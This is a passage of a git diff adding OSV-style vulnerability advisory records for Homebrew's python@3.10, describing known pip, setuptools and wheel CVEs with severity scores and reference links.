"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/google-github-actions/run-gemini-cli/security/advisories/GHSA-wpqr-6v78-jr5g" + }, + { + "type": "PACKAGE", + "url": "https://github.com/google-github-actions/run-gemini-cli" + } + ] +} diff --git a/advisories/BREW-python@3.10-CVE-2013-1629.json b/advisories/BREW-python@3.10-CVE-2013-1629.json new file mode 100644 index 00000000000..bd879153678 --- /dev/null +++ b/advisories/BREW-python@3.10-CVE-2013-1629.json @@ -0,0 +1,117 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-python@3.10-CVE-2013-1629", + "published": "2026-08-13T17:29:58Z", + "modified": "2026-08-13T17:29:58Z", + "upstream": [ + "GHSA-g3p5-fjj9-h8gj", + "CVE-2013-1629", + "PYSEC-2013-8" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "python@3.10", + "purl": "pkg:brew/python%403.10" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.10.21" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "1.3", + "resource": "pip", + "resource_purl": "pkg:pypi/pip@26.2.1" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pip", + "subject_version": "26.2.1", + "key": "pkg:pypi/pip@26.2.1", + "resource": "pip" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pip", + "subject_version": "26.2.1", + "key": "pkg:pypi/pip@26.2.1", + "resource": "pip" + } + ] + }, + "summary": "Improper Input Validation in pip", + "details": "pip before 1.3 uses HTTP to retrieve packages from the PyPI repository, and does not perform integrity checks on package contents, which allows man-in-the-middle attackers to execute arbitrary code via a crafted response to a \"pip install\" operation.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-1629" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/pip/issues/425" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/pip/pull/791/files" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=968059" + }, + { + "type": "ADVISORY", + "url": "https://github.com/advisories/GHSA-g3p5-fjj9-h8gj" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pip/PYSEC-2013-8.yaml" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pypa/pip" + }, + { + "type": "WEB", + "url": "http://www.pip-installer.org/en/latest/installing.html" + }, + { + "type": "WEB", + "url": "http://www.pip-installer.org/en/latest/news.html#changelog" + }, + { + "type": "WEB", + "url": "http://www.reddit.com/r/Python/comments/17rfh7/warning_dont_use_pip_in_an_untrusted_network_a" + } + ] +} diff --git a/advisories/BREW-python@3.10-CVE-2013-1633.json b/advisories/BREW-python@3.10-CVE-2013-1633.json new file mode 100644 index 00000000000..1b0a8b65771 --- /dev/null +++ b/advisories/BREW-python@3.10-CVE-2013-1633.json @@ -0,0 +1,93 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-python@3.10-CVE-2013-1633", + "published": "2026-08-13T17:29:58Z", + "modified": "2026-08-13T17:29:58Z", + "upstream": [ + "GHSA-27x4-j476-jp5f", + "CVE-2013-1633", + "PYSEC-2013-22" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "python@3.10", + "purl": "pkg:brew/python%403.10" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.10.21" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "0.7", + "resource": "setuptools", + "resource_purl": "pkg:pypi/setuptools@84.0.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "setuptools", + "subject_version": "84.0.0", + "key": "pkg:pypi/setuptools@84.0.0", + "resource": "setuptools" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "setuptools", + "subject_version": "84.0.0", + "key": "pkg:pypi/setuptools@84.0.0", + "resource": "setuptools" + } + ] + }, + "summary": "Setuptools vulnerable to Man-in-the-middle attacks", + "details": "easy_install in setuptools before 0.7 uses HTTP to retrieve packages from the PyPI repository, and does not perform integrity checks on package contents, which allows man-in-the-middle attackers to execute arbitrary code via a crafted response to the default use of the product.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-1633" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/setuptools/PYSEC-2013-22.yaml" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pypa/setuptools" + }, + { + "type": "WEB", + "url": "https://pypi.python.org/pypi/setuptools/0.9.8#changes" + }, + { + "type": "WEB", + "url": "http://www.reddit.com/r/Python/comments/17rfh7/warning_dont_use_pip_in_an_untrusted_network_a" + } + ] +} diff --git a/advisories/BREW-python@3.10-CVE-2013-1888.json b/advisories/BREW-python@3.10-CVE-2013-1888.json new file mode 100644 index 00000000000..613bd7bad89 --- /dev/null +++ b/advisories/BREW-python@3.10-CVE-2013-1888.json @@ -0,0 +1,121 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-python@3.10-CVE-2013-1888", + "published": "2026-08-13T17:29:58Z", + "modified": "2026-08-13T17:29:58Z", + "upstream": [ + "GHSA-4gv5-qhvr-36vv", + "CVE-2013-1888", + "PYSEC-2013-9" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "python@3.10", + "purl": "pkg:brew/python%403.10" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.10.21" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "1.3", + "resource": "pip", + "resource_purl": "pkg:pypi/pip@26.2.1" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pip", + "subject_version": "26.2.1", + "key": "pkg:pypi/pip@26.2.1", + "resource": "pip" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pip", + "subject_version": "26.2.1", + "key": "pkg:pypi/pip@26.2.1", + "resource": "pip" + } + ] + }, + "summary": "Improper Link Resolution Before File Access in pip", + "details": "pip before 1.3 allows local users to overwrite arbitrary files via a symlink attack on a file in the /tmp/pip-build temporary directory.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-1888" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/pip/issues/725" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/pip/pull/734/files" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/pip/pull/780/files" + }, + { + "type": "ADVISORY", + "url": "https://github.com/advisories/GHSA-4gv5-qhvr-36vv" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pip/PYSEC-2013-9.yaml" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pypa/pip" + }, + { + "type": "WEB", + "url": "http://lists.fedoraproject.org/pipermail/package-announce/2013-May/105952.html" + }, + { + "type": "WEB", + "url": "http://lists.fedoraproject.org/pipermail/package-announce/2013-May/105989.html" + }, + { + "type": "WEB", + "url": "http://lists.fedoraproject.org/pipermail/package-announce/2013-May/106311.html" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2013/03/22/10" + } + ] +} diff --git a/advisories/BREW-python@3.10-CVE-2013-5123.json b/advisories/BREW-python@3.10-CVE-2013-5123.json new file mode 100644 index 00000000000..bf18ef465de --- /dev/null +++ b/advisories/BREW-python@3.10-CVE-2013-5123.json @@ -0,0 +1,117 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-python@3.10-CVE-2013-5123", + "published": "2026-08-13T17:29:58Z", + "modified": "2026-08-13T17:29:58Z", + "upstream": [ + "GHSA-c5h8-cq4v-cvfm", + "CVE-2013-5123", + "PYSEC-2019-160" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "python@3.10", + "purl": "pkg:brew/python%403.10" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.10.21" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "1.5", + "resource": "pip", + "resource_purl": "pkg:pypi/pip@26.2.1" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pip", + "subject_version": "26.2.1", + "key": "pkg:pypi/pip@26.2.1", + "resource": "pip" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pip", + "subject_version": "26.2.1", + "key": "pkg:pypi/pip@26.2.1", + "resource": "pip" + } + ] + }, + "summary": "Improper Authentication in pip", + "details": "The mirroring support (-M, --use-mirrors) in Python Pip before 1.5 uses insecure DNS querying and authenticity checks which allows attackers to perform man-in-the-middle attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-5123" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-5123" + }, + { + "type": "WEB", + "url": "https://bugzilla.suse.com/show_bug.cgi?id=CVE-2013-5123" + }, + { + "type": "ADVISORY", + "url": "https://github.com/advisories/GHSA-c5h8-cq4v-cvfm" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pip/PYSEC-2019-160.yaml" + }, + { + "type": "WEB", + "url": "https://security-tracker.debian.org/tracker/CVE-2013-5123" + }, + { + "type": "WEB", + "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-April/155248.html" + }, + { + "type": "WEB", + "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-April/155291.html" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2013/08/21/17" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2013/08/21/18" + } + ] +} diff --git a/advisories/BREW-python@3.10-CVE-2014-8991.json b/advisories/BREW-python@3.10-CVE-2014-8991.json new file mode 100644 index 00000000000..74295173124 --- /dev/null +++ b/advisories/BREW-python@3.10-CVE-2014-8991.json @@ -0,0 +1,113 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-python@3.10-CVE-2014-8991", + "published": "2026-08-13T17:29:58Z", + "modified": "2026-08-13T17:29:58Z", + "upstream": [ + "GHSA-53mr-44pp-crf4", + "CVE-2014-8991", + "PYSEC-2014-11" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "python@3.10", + "purl": "pkg:brew/python%403.10" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.10.21" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "6.0", + "resource": "pip", + "resource_purl": "pkg:pypi/pip@26.2.1" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pip", + "subject_version": "26.2.1", + "key": "pkg:pypi/pip@26.2.1", + "resource": "pip" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pip", + "subject_version": "26.2.1", + "key": "pkg:pypi/pip@26.2.1", + "resource": "pip" + } + ] + }, + "summary": "pip lack of randomness in build directory", + "details": "pip 1.3 through 1.5.6 allows local users to cause a denial of service (prevention of package installation) by creating a `/tmp/pip-build-*` file for another user.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-8991" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/pip/pull/2122" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/pip/commit/043fe9f5700315d97f83609c1f59deece8f1b901" + }, + { + "type": "WEB", + "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725847" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pip/PYSEC-2014-11.yaml" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pypa/pip" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2014/11/19/17" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2014/11/20/6" + }, + { + "type": "WEB", + "url": "http://www.oracle.com/technetwork/topics/security/bulletinjul2015-2511963.html" + } + ] +} diff --git a/advisories/BREW-python@3.10-CVE-2019-20916.json b/advisories/BREW-python@3.10-CVE-2019-20916.json new file mode 100644 index 00000000000..3b050757ca6 --- /dev/null +++ b/advisories/BREW-python@3.10-CVE-2019-20916.json @@ -0,0 +1,125 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-python@3.10-CVE-2019-20916", + "published": "2026-08-13T17:29:58Z", + "modified": "2026-08-13T17:29:58Z", + "upstream": [ + "GHSA-gpvv-69j7-gwj8", + "CVE-2019-20916", + "PYSEC-2020-173" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "python@3.10", + "purl": "pkg:brew/python%403.10" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.10.21" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "19.2", + "resource": "pip", + "resource_purl": "pkg:pypi/pip@26.2.1" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pip", + "subject_version": "26.2.1", + "key": "pkg:pypi/pip@26.2.1", + "resource": "pip" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pip", + "subject_version": "26.2.1", + "key": "pkg:pypi/pip@26.2.1", + "resource": "pip" + } + ] + }, + "summary": "Path Traversal in pip", + "details": "The pip package before 19.2 for Python allows Directory Traversal when a URL is given in an install command, because a Content-Disposition header can have ../ in a filename, as demonstrated by overwriting the /root/.ssh/authorized_keys file. This occurs in _download_http_url in _internal/download.py. A fix was committed 6704f2ace.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-20916" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/pip/issues/6413" + }, + { + "type": "WEB", + "url": "https://github.com/gzpan123/pip/commit/a4c735b14a62f9cb864533808ac63936704f2ace" + }, + { + "type": "ADVISORY", + "url": "https://github.com/advisories/GHSA-gpvv-69j7-gwj8" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pip/PYSEC-2020-173.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/pip" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/pip/compare/19.1.1...19.2" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00010.html" + }, + { + "type": "WEB", + "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" + }, + { + "type": "WEB", + "url": "https://www.oracle.com/security-alerts/cpujul2022.html" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00005.html" + }, + { + "type": "WEB", + "url": "http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00010.html" + } + ] +} diff --git a/advisories/BREW-python@3.10-CVE-2021-3572.json b/advisories/BREW-python@3.10-CVE-2021-3572.json new file mode 100644 index 00000000000..d6b5cf6bb15 --- /dev/null +++ b/advisories/BREW-python@3.10-CVE-2021-3572.json @@ -0,0 +1,125 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-python@3.10-CVE-2021-3572", + "published": "2026-08-13T17:29:58Z", + "modified": "2026-08-13T17:29:58Z", + "upstream": [ + "GHSA-5xp3-jfq3-5q8x", + "CVE-2021-3572", + "PYSEC-2021-437" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "python@3.10", + "purl": "pkg:brew/python%403.10" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.10.21" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "21.1", + "resource": "pip", + "resource_purl": "pkg:pypi/pip@26.2.1" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pip", + "subject_version": "26.2.1", + "key": "pkg:pypi/pip@26.2.1", + "resource": "pip" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pip", + "subject_version": "26.2.1", + "key": "pkg:pypi/pip@26.2.1", + "resource": "pip" + } + ] + }, + "summary": "Improper Input Validation in pip", + "details": "A flaw was found in python-pip in the way it handled Unicode separators in git references. A remote attacker could possibly use this issue to install a different revision on a repository. The highest threat from this vulnerability is to data integrity. This is fixed in python-pip version 21.1.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3572" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/pip/pull/9827" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/pip/commit/e46bdda9711392fec0c45c1175bae6db847cb30b" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2021:3254" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1962856" + }, + { + "type": "ADVISORY", + "url": "https://github.com/advisories/GHSA-5xp3-jfq3-5q8x" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pip/PYSEC-2021-437.yaml" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pypa/pip" + }, + { + "type": "WEB", + "url": "https://packetstormsecurity.com/files/162712/USN-4961-1.txt" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240621-0006" + }, + { + "type": "WEB", + "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" + }, + { + "type": "WEB", + "url": "https://www.oracle.com/security-alerts/cpujul2022.html" + } + ] +} diff --git a/advisories/BREW-python@3.10-CVE-2022-40897.json b/advisories/BREW-python@3.10-CVE-2022-40897.json new file mode 100644 index 00000000000..18133614bc2 --- /dev/null +++ b/advisories/BREW-python@3.10-CVE-2022-40897.json @@ -0,0 +1,138 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-python@3.10-CVE-2022-40897", + "published": "2026-08-13T17:29:58Z", + "modified": "2026-08-13T17:29:58Z", + "upstream": [ + "GHSA-r9hx-vwmv-q579", + "BIT-setuptools-2022-40897", + "CVE-2022-40897", + "PYSEC-2022-43012" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "python@3.10", + "purl": "pkg:brew/python%403.10" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.10.21" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "65.5.1", + "resource": "setuptools", + "resource_purl": "pkg:pypi/setuptools@84.0.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "setuptools", + "subject_version": "84.0.0", + "key": "pkg:pypi/setuptools@84.0.0", + "resource": "setuptools" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "setuptools", + "subject_version": "84.0.0", + "key": "pkg:pypi/setuptools@84.0.0", + "resource": "setuptools" + } + ] + }, + "summary": "pypa/setuptools vulnerable to Regular Expression Denial of Service (ReDoS)", + "details": "Python Packaging Authority (PyPA)'s setuptools is a library designed to facilitate packaging Python projects. Setuptools version 65.5.0 and earlier could allow remote attackers to cause a denial of service by fetching malicious HTML from a PyPI package or custom PackageIndex page due to a vulnerable Regular Expression in `package_index`. This has been patched in version 65.5.1.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:L/SI:L/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-40897" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/setuptools/issues/3659" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/setuptools/commit/43a9c9bfa6aa626ec2a22540bea28d2ca77964be" + }, + { + "type": "WEB", + "url": "https://setuptools.pypa.io/en/latest" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240621-0006" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20230214-0001" + }, + { + "type": "WEB", + "url": "https://pyup.io/vulnerabilities/CVE-2022-40897/52495" + }, + { + "type": "WEB", + "url": "https://pyup.io/posts/pyup-discovers-redos-vulnerabilities-in-top-python-packages" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YNA2BAH2ACBZ4TVJZKFLCR7L23BG5C3H" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ADES3NLOE5QJKBLGNZNI2RGVOSQXA37R" + }, + { + "type": "WEB", + "url": "https://lists.debian.org/debian-lts-announce/2024/09/msg00018.html" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/setuptools/compare/v65.5.0...v65.5.1" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/setuptools/blob/fe8a98e696241487ba6ac9f91faa38ade939ec5d/setuptools/package_index.py#L200" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pypa/setuptools" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/setuptools/PYSEC-2022-43012.yaml" + } + ] +} diff --git a/advisories/BREW-python@3.10-CVE-2022-40898.json b/advisories/BREW-python@3.10-CVE-2022-40898.json new file mode 100644 index 00000000000..b66c36ea6b9 --- /dev/null +++ b/advisories/BREW-python@3.10-CVE-2022-40898.json @@ -0,0 +1,101 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-python@3.10-CVE-2022-40898", + "published": "2026-08-13T17:29:58Z", + "modified": "2026-08-13T17:29:58Z", + "upstream": [ + "GHSA-qwmp-2cf2-g9g6", + "CVE-2022-40898", + "PYSEC-2022-43017" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "python@3.10", + "purl": "pkg:brew/python%403.10" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.10.21" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "0.38.1", + "resource": "wheel", + "resource_purl": "pkg:pypi/wheel@0.48.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "wheel", + "subject_version": "0.48.0", + "key": "pkg:pypi/wheel@0.48.0", + "resource": "wheel" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "wheel", + "subject_version": "0.48.0", + "key": "pkg:pypi/wheel@0.48.0", + "resource": "wheel" + } + ] + }, + "summary": "pypa/wheel vulnerable to Regular Expression denial of service (ReDoS)", + "details": "Python Packaging Authority (PyPA) Wheel is a reference implementation of the Python wheel packaging standard. Wheel 0.37.1 and earlier are vulnerable to a Regular Expression denial of service via attacker controlled input to the wheel cli. The vulnerable regex is used to verify the validity of Wheel file names. This has been patched in version 0.38.1.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-40898" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/wheel/PYSEC-2022-43017.yaml" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pypa/wheel" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/wheel/blob/main/src/wheel/wheelfile.py#L18" + }, + { + "type": "WEB", + "url": "https://pypi.org/project/wheel" + }, + { + "type": "WEB", + "url": "https://pyup.io/posts/pyup-discovers-redos-vulnerabilities-in-top-python-packages" + }, + { + "type": "WEB", + "url": "https://pyup.io/vulnerabilities/CVE-2022-40898/51499" + } + ] +} diff --git a/advisories/BREW-python@3.10-CVE-2023-5752.json b/advisories/BREW-python@3.10-CVE-2023-5752.json new file mode 100644 index 00000000000..942d9fe6a56 --- /dev/null +++ b/advisories/BREW-python@3.10-CVE-2023-5752.json @@ -0,0 +1,125 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-python@3.10-CVE-2023-5752", + "published": "2026-08-13T17:29:58Z", + "modified": "2026-08-13T17:29:58Z", + "upstream": [ + "GHSA-mq26-g339-26xf", + "CVE-2023-5752", + "PYSEC-2023-228" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "python@3.10", + "purl": "pkg:brew/python%403.10" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.10.21" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "23.3", + "resource": "pip", + "resource_purl": "pkg:pypi/pip@26.2.1" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pip", + "subject_version": "26.2.1", + "key": "pkg:pypi/pip@26.2.1", + "resource": "pip" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pip", + "subject_version": "26.2.1", + "key": "pkg:pypi/pip@26.2.1", + "resource": "pip" + } + ] + }, + "summary": "Command Injection in pip when used with Mercurial", + "details": "When installing a package from a Mercurial VCS URL, e.g. `pip install hg+...`, with pip prior to v23.3, the specified Mercurial revision could be used to inject arbitrary configuration options to the `hg clone` call (e.g. `--config`). Controlling the Mercurial configuration can modify how and which repository is installed. This vulnerability does not affect users who aren't installing from Mercurial.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5752" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/pip/pull/12306" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/pip/commit/389cb799d0da9a840749fcd14878928467ed49b4" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pip/PYSEC-2023-228.yaml" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pypa/pip" + }, + { + 